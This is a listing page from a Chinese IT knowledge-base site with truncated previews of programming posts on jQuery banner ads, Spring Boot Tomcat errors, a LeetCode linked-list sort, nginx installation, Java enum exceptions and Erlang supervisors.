                                
                                jQuery网站顶部定时折叠广告
                                    ini
JavaScripthtmljqueryWebcss
                                    效果体验：http://hovertree.com/texiao/jquery/4.htmHTML文件代码： 
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>网页顶部定时收起广告jQuery特效 - HoverTree<
                                
                                Spring boot内嵌的tomcat启动失败
                                    kane_xie
spring boot
                                    根据这篇guide创建了一个简单的spring boot应用，能运行且成功的访问。但移植到现有项目（基于hbase）中的时候，却报出以下错误： 
  
  
SEVERE: A child container failed during start
java.util.concurrent.ExecutionException: org.apache.catalina.Lif
                                
                                leetcode: sort list
                                    michelle_0916
Algorithmlinked listsort
                                    Sort a linked list in O(n log n) time using constant space complexity. 
====analysis======= 
mergeSort for singly-linked list  
====code=======      /** 
 * Definition for sin
                                
                                nginx的安装与配置,中途遇到问题的解决
                                    qifeifei
nginx
                                    我使用的是ubuntu13.04系统，在安装nginx的时候遇到如下几个问题，然后找思路解决的，nginx 的下载与安装 
  
wget http://nginx.org/download/nginx-1.0.11.tar.gz
tar zxvf nginx-1.0.11.tar.gz
./configure
make
make install 
  
安装的时候出现
                                
                                用枚举来处理java自定义异常
                                    tcrct
javaenumexception
                                    在系统开发过程中，总少不免要自己处理一些异常信息，然后将异常信息变成友好的提示返回到客户端的这样一个过程，之前都是new一个自定义的异常，当然这个所谓的自定义异常也是继承RuntimeException的，但这样往往会造成异常信息说明不一致的情况，所以就想到了用枚举来解决的办法。 
 
1，先创建一个接口，里面有两个方法，一个是getCode, 一个是getMessage 
 

public 
                                
                                erlang supervisor分析
                                    wudixiaotie
erlang
                                    当我们给supervisor指定需要创建的子进程的时候，会指定M,F,A,如果是simple_one_for_one的策略的话，启动子进程的方式是supervisor:start_child(SupName, OtherArgs),这种方式可以根据调用者的需求传不同的参数给需要启动的子进程的方法。和最初的参数合并成一个数组，A ++ OtherArgs。那么这个时候就有个问题了，既然参数不一致，那
                                
                
            
        
    


    
        
            按字母分类：
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他
        
    


    
        
            首页 -
            关于我们 -
            站内搜索 -
            Sitemap -
            侵权投诉
        
        版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.